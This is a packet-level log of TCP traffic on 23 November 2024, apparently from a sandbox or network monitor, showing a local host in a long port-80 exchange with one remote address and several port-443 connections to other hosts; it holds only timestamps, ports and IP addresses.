Nov 23, 2024 07:09:42.776716948 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.776834011 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.776881933 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.777822018 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.777956009 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.778033972 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.778971910 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.779062986 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.779253006 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.780162096 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.780220032 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.780298948 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.780344963 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.781313896 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.781385899 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.781399965 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.781544924 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.788628101 CET	49860	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.788628101 CET	49862	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:42.845854998 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.895129919 CET	49880	443	192.168.2.6	18.238.49.124
Nov 23, 2024 07:09:42.895164967 CET	443	49880	18.238.49.124	192.168.2.6
Nov 23, 2024 07:09:42.895230055 CET	49880	443	192.168.2.6	18.238.49.124
Nov 23, 2024 07:09:42.895466089 CET	49880	443	192.168.2.6	18.238.49.124
Nov 23, 2024 07:09:42.895483971 CET	443	49880	18.238.49.124	192.168.2.6
Nov 23, 2024 07:09:42.896044016 CET	49881	443	192.168.2.6	23.44.201.5
Nov 23, 2024 07:09:42.896079063 CET	443	49881	23.44.201.5	192.168.2.6
Nov 23, 2024 07:09:42.896307945 CET	49881	443	192.168.2.6	23.44.201.5
Nov 23, 2024 07:09:42.896307945 CET	49881	443	192.168.2.6	23.44.201.5
Nov 23, 2024 07:09:42.896343946 CET	443	49881	23.44.201.5	192.168.2.6
Nov 23, 2024 07:09:42.929828882 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:42.965274096 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.977314949 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.977338076 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.977345943 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.977379084 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.977391958 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.977400064 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.977406025 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:42.977418900 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:42.977451086 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:42.977468967 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.042268038 CET	443	49868	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:43.042653084 CET	49868	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:43.042670012 CET	443	49868	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:43.044101954 CET	443	49868	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:43.044156075 CET	49868	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:43.044516087 CET	49868	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:43.044584990 CET	443	49868	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:43.132092953 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.132121086 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.132129908 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.132147074 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.132162094 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.132172108 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.132184029 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.132230997 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.132263899 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.132286072 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.153290987 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.153316975 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.153362989 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.153405905 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.153462887 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.153523922 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.192176104 CET	49868	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:43.192184925 CET	443	49868	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:43.204659939 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.204706907 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.204766989 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.204782963 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.204814911 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.204852104 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.228815079 CET	49882	443	192.168.2.6	104.117.182.56
Nov 23, 2024 07:09:43.228847980 CET	443	49882	104.117.182.56	192.168.2.6
Nov 23, 2024 07:09:43.228926897 CET	49882	443	192.168.2.6	104.117.182.56
Nov 23, 2024 07:09:43.229101896 CET	49882	443	192.168.2.6	104.117.182.56
Nov 23, 2024 07:09:43.229115009 CET	443	49882	104.117.182.56	192.168.2.6
Nov 23, 2024 07:09:43.245894909 CET	443	49866	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.246387959 CET	49866	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.246404886 CET	443	49866	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.247092009 CET	49866	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.247101068 CET	443	49866	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.291857958 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.291914940 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.291960955 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.292015076 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.292464972 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.292553902 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.293154001 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.293636084 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.293689966 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.293698072 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.293862104 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.294766903 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.294820070 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.294842005 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.294945955 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.295836926 CET	443	49863	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.295924902 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.296029091 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.296217918 CET	49863	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.296237946 CET	443	49863	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.296257019 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.296649933 CET	49863	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.296654940 CET	443	49863	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.297084093 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.297135115 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.297168970 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.297298908 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.298422098 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.298441887 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.298471928 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.298485994 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.299403906 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.299453020 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.299499989 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.299611092 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.300565958 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.300615072 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.300654888 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.300710917 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.301733971 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.301830053 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.301882982 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.302886963 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.302977085 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.302997112 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.303066015 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.304045916 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.304163933 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.304219961 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.305206060 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.305321932 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.305362940 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.306376934 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.306488037 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.306677103 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.307533979 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.307595015 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.307636976 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.307718039 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.308715105 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.308774948 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.308816910 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.308943987 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.309849024 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.309899092 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.309983969 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.310029984 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.311018944 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.311067104 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.311122894 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.311193943 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.311790943 CET	443	49865	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.312129021 CET	49865	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.312150002 CET	443	49865	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.312175989 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.312232018 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.312297106 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.312582970 CET	49865	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.312589884 CET	443	49865	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.312616110 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.313358068 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.313421011 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.313457966 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.313529968 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.314502954 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.314553976 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.314598083 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.314656019 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.315659046 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.315711975 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.315753937 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.315813065 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.316826105 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.316942930 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.317159891 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.317991018 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.318046093 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.318089008 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.318200111 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.319124937 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.319180012 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.319242954 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.319328070 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.320373058 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.320425987 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.320441008 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.320542097 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.321460962 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.321513891 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.321552038 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.321635962 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.322637081 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.322690964 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.322727919 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.322899103 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.323782921 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.323842049 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.323893070 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.323955059 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.324939013 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.324995041 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.325037003 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.325119019 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.326149940 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.326205015 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.326242924 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.326330900 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.327291012 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.327352047 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.327429056 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.327466965 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.328430891 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.328504086 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.328521013 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.328583956 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.328941107 CET	443	49867	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.329651117 CET	49867	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.329689026 CET	443	49867	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.329740047 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.329742908 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.329760075 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.329775095 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.329926968 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.329936981 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.329946995 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.330044985 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.330094099 CET	49867	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.330106020 CET	443	49867	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.330785990 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.330859900 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.330902100 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.331576109 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.331933022 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.332031965 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.332089901 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.332257986 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.332273006 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.332341909 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.332365036 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.332407951 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.332456112 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.332484007 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.332511902 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.332586050 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.333060026 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.333153009 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.333246946 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.333314896 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.334261894 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.334357977 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.334387064 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.334686995 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.335417986 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.335433960 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.335547924 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.336556911 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.336661100 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.336698055 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.336802959 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.337763071 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.337821960 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.337836027 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.337975025 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.338886976 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.339010954 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.339102983 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.340044975 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.340091944 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.340135098 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.340244055 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.341203928 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.341264009 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.341291904 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.341348886 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.342349052 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.342400074 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.342478037 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.342555046 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.343540907 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.343643904 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.343673944 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.343689919 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.344696999 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.344753981 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.344789982 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.344917059 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.345890999 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.345951080 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.345967054 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.346043110 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.346992970 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.347059011 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.347124100 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.348160028 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.348263979 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.348325014 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.349318981 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.349431992 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.349487066 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.350483894 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.350600004 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.351634026 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.351696968 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.351730108 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.351823092 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.352797985 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.352943897 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.353318930 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.354018927 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:43.354080915 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:43.366879940 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.366935015 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.366976023 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.367022038 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.367029905 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.369379044 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.377527952 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.377540112 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.377593040 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.377630949 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.377661943 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.377701044 CET	443	49855	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.377744913 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.377783060 CET	49855	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.379133940 CET	49868	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:43.384151936 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.384182930 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.384238958 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.384275913 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.384305954 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.387090921 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.404134035 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.404150009 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.404227972 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.404264927 CET	443	49856	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:43.405016899 CET	49856	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:43.450408936 CET	443	49864	13.107.246.63	192.168.2.6
